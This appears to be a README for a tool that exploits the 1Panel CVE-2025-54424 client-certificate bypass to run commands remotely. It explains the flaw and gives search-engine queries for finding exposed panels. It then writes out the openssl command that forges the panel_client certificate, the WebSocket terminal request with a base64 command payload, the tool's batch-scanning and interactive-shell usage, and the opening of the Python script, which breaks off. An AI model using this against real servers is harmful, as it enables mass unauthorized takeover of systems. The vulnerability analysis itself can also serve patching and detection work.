
Exploit tool for 1Panel CVE-2025-54424, enabling certificate bypass and remote command execution via WebSocket, with batch scanning and interactive shell.
CVE-2025-54424:1Panel Client Certificate Bypass RCE Vulnerability All-in-One Tool (Scan + Exploit)
1Panel is an open-source, modern Linux operation and maintenance panel that provides a graphical interface for deploying websites, managing servers, and running services.
In affected versions, the Agent-side TLS authentication policy is set to tls.RequireAnyClientCert, which only requires a certificate but does not verify its trustworthiness. An attacker can bypass TLS verification with a self-signed certificate, forge the CN field to panel_client, and bypass application-layer validation. Ultimately, the attacker can forge a certificate to make unauthorized command execution interface calls, leading to a remote command execution vulnerability.
<= v2.0.5
The hunter and fofa reconnaissance queries are as follows
cert.subject_org=="FIT2CLOUD"&&ip.port="9999” || cert.subject.suffix=="panel_server"
cert.subject.org="FIT2CLOUD" && port="9999" && protocol="tls" || cert.subject.cn="panel_server"
Copy from GitHub vulnerability advisory section

agent/init/router/router.go
It is found that the Routers function references the Certificate function for global validation in agent/middleware/certificate.go

It is found that the Certificate function checks whether c.Request.TLS.HandshakeComplete indicates certificate communication.

Since the truth value of c.Request.TLS.HandshakeComplete is determined by tls.RequireAnyClientCert in the Start function of agent/server/server.go
Note: Here, because tls.RequireAnyClientCert is used instead of tls.RequireAndVerifyClientCert, RequireAnyClientCert only requires the client to provide a certificate but does not verify the issuing CA. Therefore, any self-signed certificate can pass the TLS handshake.
Subsequent checks in the Certificate function only verify that the certificate CN field is panel_client, without verifying the certificate issuer. Finally, it was found that WebSocket connections can bypass Proxy-ID verification.

There are numerous WebSocket interfaces in the project.
/process/ws
Request format:{
"type": "ps", // Data type: ps(process), ssh(SSH session), net(network connection), wget(download progress)
"pid": 123, // Optional, filter by process ID
"name": "process_name", // Optional, filter by process name
"username": "user" // Optional, filter by username
}

/hosts/terminal
Request format:{
"type": "cmd",
"data": "d2hvYW1pCg==" // Base64 encoding of "whoami", remember not to omit the newline.
}

/containers/terminal/files/wget/processGenerate certificate:
openssl req -x509 -newkey rsa:2048 -keyout panel_client.key -out panel_client.crt -days 365 -nodes -subj "/CN=panel_client"
After loading the generated panel_client.crt and panel_client.key in Burp, open a WebSocket request, set the target, and start the request.
Use the tool I developed, CVE-2025-54424.py, for batch detection and exploitation. Usage instructions are as follows:
Install required dependencies: pip install websocket-client cryptography PySocks requests
usage: CVE-2025-54424.py [-h] (-u URL | -f FILE) [-o OUTPUT] [-t THREADS]
[--proxy PROXY]
1Panel 客户端证书绕过RCE漏洞 一体化工具 (扫描+利用)
作者: Mrxn https://github.com/Mr-xn
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL 单个目标,进入利用模式。例如: 192.168.1.100:8080
-f FILE, --file FILE 目标文件,进入批量扫描模式。
-o OUTPUT, --output OUTPUT
[扫描模式] 保存漏洞结果的文件名。
-t THREADS, --threads THREADS
[扫描模式] 并发线程数。
--proxy PROXY 为所有请求设置代理。例如: http://127.0.0.1:8080
For example, single target detection + command execution (interactive SSH command execution) is shown below:

import base64
import ssl
import sys
import json
import os
import tempfile
import argparse
import requests
import websocket
import threading
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import urlparse
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
import datetime
# 禁用 requests 库在禁用SSL验证时产生的警告
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# --- 全局变量和线程锁 ---
print_lock = threading.Lock()
exploit_running = True
vulnerable_hosts = []
# --- 核心功能函数 ---